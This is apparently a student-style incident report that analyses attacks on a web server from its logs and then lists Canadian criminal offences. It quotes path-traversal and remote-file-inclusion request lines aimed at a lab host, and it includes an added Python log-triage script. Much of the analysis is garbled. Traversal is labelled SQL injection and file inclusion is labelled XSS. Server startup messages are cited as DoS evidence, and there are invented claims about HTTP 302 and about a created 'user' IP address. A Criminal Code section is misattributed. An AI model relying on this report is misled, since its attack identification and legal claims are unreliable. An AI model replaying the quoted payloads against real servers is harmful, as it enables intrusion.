Attack Analysis

Introduction
Following a complainant's report that their company's web servers had been subjected to attacks, an analysis was conducted to understand those attacks. This report provides the elements requested on the attacks and offenses by identifying which attacks were successful and which were not. It also sets out the infractions, including the criminal offenses committed against the company with regard to the Canadian justice code, and the next steps in the investigation.
Successful Attacks
SQL Injection
Also known as SQLI, it is an attack in which the attacker employs malicious code to manipulate the backend database of a web server and gain access to information that is not intended for display. The attacker can also use SQL injection vulnerabilities to bypass the web application's security measures. A SQL injection attack enables the attacker to select and output data from the web database, alter the database, add new data, delete records, and access the operating system through the database server. Based on the access and error logs from the company's server, the attacker with IP address 24.122.48.222 successfully executed a SQL injection to access the company data. The following log entry identifies the SQL injection:
24.122.48.222 - - [29/Jan/2020:12:47:34 -0400] "GET /cgibin/afficheTexte.pl?page=../../../../lab6/secret HTTP/1.1" 200 75 "-"
The log entry indicates that the attacker, with IP address 24.122.48.222, attempted to access the lab6 secrets; the 2XX status code 200 indicates that the HTTP request succeeded and that the response contained the result of the requested action.
Cross Site Scripting
Cross-site scripting (XSS) is a web security vulnerability that enables the attacker to send their own code into a web application through malicious executable scripts, such as Flash, Java, HTML, and Ajax. Successful cross-site scripting allows the attacker to impersonate the victim user and create a user account, perform any action the user is able to perform, read the user's data, capture access credentials, and perform actions that cause dysfunction, such as injecting a trojan into the web site. The record lines indicating that cross-site scripting was successfully conducted by the attacker, with IP address 24.122.48.222, include:
24.122.48.222 - - [29/Jan/2020:13:00:59 -0400] "GET /rfi/affiche.php?var=http://cy140.lab/rien.php HTTP/1.1" 302 727 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
The log entry indicates that the requested resource was found and moved to another URL; the 302 code, since superseded by 303, indicates that the attacker was able to trigger a temporary redirect by moving the original describing phrase. The Web uses the 302 status code to distinguish a status code that was successfully added.
Denial-of-service (DDoS) and Malware
The attacker uses a malware attack, particularly the drive-by attack, which involves feeding malicious script into the PHP or HTTP of the web pages to redirect the victim's browser into the control of the attacker. Deploying the drive-by attack results in a Denial-of-Service (DoS), as the user finds it difficult to access the requested service. The log entries below, generated from IP address 24.122.48.222, indicate that the attacker successfully deployed a drive-by attack to execute the DoS.

[Wed Jan 08 13:53:40 2020] [notice] Digest: done
[Wed Jan 08 13:53:40 2020] [notice] Digest: generating secret for digest authentication …
[Wed Jan 08 13:53:40 2020] [notice] mod_python: Creating 4 session mutexes based on 256 max processes and 0 max threads.
Unsuccessful Attack
File Inclusion Attack
File inclusion involves the attacker accessing unauthorized or sensitive files on the web server through the 'include' functionality. The attacker exploits a file inclusion vulnerability that arises from poor input validation, whereby the user input passed to the include call is not properly validated. The attacker could not execute the file inclusion attack, which would have enabled him to run malicious code on the server or to make the server reveal sensitive files present on it. An example of a failed file inclusion attack from the log analysis is provided below. The user at IP address 24.122.48.222 received a 404 client error when requesting inclusion of the lab data file, indicating that the requested resource was not found.
[Wed Jan 29 12:49:55 2020] [error] [client 24.122.48.222] PHP Warning: include(http://cy140.lab/data.php) [function.include]: failed to open stream: HTTP request failed! HTTP/1.1 404 Undescribedrn in /var/www/html/rfi/affiche.php on line 3
The hacker created the user 192.168.2.106; however, the user was not an administrator.
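The SQL injection, cross-site scripting and file inclusion sections above each identify an attack from a single access-log line and its status code. The following Python script is an added example, not part of the original report: it parses Apache-style access-log lines, flags the two request patterns visible in the quoted entries (a repeated ../ sequence in a query value, and a remote URL passed as a parameter value), and records per client whether the server served, redirected or refused the request. The signature names and the sample lines are my own constructions modelled on the report's entries.

```python
import re
from collections import Counter

# Apache combined-log-style line, the format of the access-log entries quoted above.
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)')

# Request patterns visible in the quoted entries (signature names are my own labels, not the report's).
SIGNATURES = {
    "path_traversal": re.compile(r"(\.\./){2,}"),
    "remote_file_inclusion": re.compile(r"=[a-z]+://", re.IGNORECASE),
}

def parse_access_line(line):
    # Return the fields of one access-log line as a dict, or None if the line does not parse.
    m = ACCESS_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry

def outcome(status):
    # 2xx: the request was served; 3xx: redirected; anything else: refused or errored.
    if 200 <= status < 300:
        return "succeeded"
    return "redirected" if 300 <= status < 400 else "failed"

def classify(entry):
    # Return (signature, outcome) for a parsed entry, or None if no signature matches the path.
    for name, pattern in SIGNATURES.items():
        if pattern.search(entry["path"]):
            return name, outcome(entry["status"])
    return None

def triage(lines):
    # Count (client IP, signature, outcome) triples over a batch of access-log lines.
    counts = Counter()
    for line in lines:
        entry = parse_access_line(line)
        hit = classify(entry) if entry else None
        if hit:
            counts[(entry["ip"], hit[0], hit[1])] += 1
    return counts

SAMPLE = [  # constructed sample lines modelled on the report's entries, not real captures
    '24.122.48.222 - - [29/Jan/2020:12:47:34 -0400] "GET /cgibin/afficheTexte.pl?page=../../../../lab6/secret HTTP/1.1" 200 75 "-"',
    '24.122.48.222 - - [29/Jan/2020:13:00:59 -0400] "GET /rfi/affiche.php?var=http://cy140.lab/rien.php HTTP/1.1" 302 727 "-"',
    '24.122.48.222 - - [29/Jan/2020:12:49:55 -0400] "GET /rfi/affiche.php?var=http://cy140.lab/data.php HTTP/1.1" 404 512 "-"',
    '192.168.2.106 - - [29/Jan/2020:12:50:00 -0400] "GET /index.html HTTP/1.1" 200 1024 "-"',
]
```

Running triage(SAMPLE) yields one succeeded traversal request, one redirected and one failed remote-include request, all from 24.122.48.222, while the benign request from 192.168.2.106 is not counted.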
The Infractions
Based on the identified attacks, the criminal offenses committed against the complainant with regard to the Canadian justice code are cybercrime. Cybercrime as a Canadian criminal offense is defined under four categories: cyber-dependent crimes, computer-supported crimes, cyber-enabled crimes, and national security offenses. The cybercrime committed against the complainant is the cyber-dependent crime, which involves the use of the computer, its network, and other technologies (Lukings and Lashkari, 2020). The types of crime and their respective criminal offenses under the Criminal Code provisions of Canada that can be linked to this report include:
Hacking: Section 184 of the criminal provision code, which prohibits fraudulently obtaining any computer service or intercepting the function of a computer to obtain or use private information. The offender faces up to five years imprisonment. Based on the report, the most severe attacks against the complainant included unauthorized access to sensitive files and documents.
Denial-of-Service (DoS) attacks: Section 430(1.1) of the criminal provision code, which prohibits mischief that involves interrupting, obstructing, or interfering with the lawful use of computer data, or denying access to a person who is entitled to a computer. The offender faces a maximum of ten years imprisonment for the offense. The report indicates that the server owners had difficulty accessing, or were denied access to, various web server services due to the DoS attack.
Malware: Section 430 of the Canadian criminal provision code stipulates that it is a criminal offense to willfully interfere with, access, or damage computer data without authorization, or to deny the computer owner access to the data. The offender faces up to ten years imprisonment. The report indicates that the attacker attempted to interfere with and access the company's data.
Steps in the Investigation
Following the identification of the attacks against the company's web server, the evidence gathered is used to bring civil or other private action against the perpetrator. The incident is to be reported to the Royal Canadian Mounted Police (RCMP), which under the National Cyber Security Strategy is responsible for coordinating cybercrime investigations and providing prosecution advice (Wasser & Pennington, 2020). The evidence and the investigation will form the basis for the company to bring a class-action lawsuit against the attacker, including claims for violation of privacy, breach of consumer protection legislation, and breach of confidence.
References
Lukings, M., & Lashkari, A. (2020). Understanding Canadian cybersecurity laws: Interpersonal privacy and cybercrime — Criminal Code of Canada (Article 4). IT World Canada. Retrieved from https://www.itworldcanada.com/blog/understanding-canadian-cybersecurity-laws-interpersonal-privacy-and-cybercrime-criminal-code-of-canada-article-4/440337
Wasser, L., & Pennington, K. (2020). Canada: Cybersecurity Laws and Regulations. The International Comparative Legal Guide. Retrieved from https://iclg.com/practice-areas/cybersecurity-laws-and-regulations/canada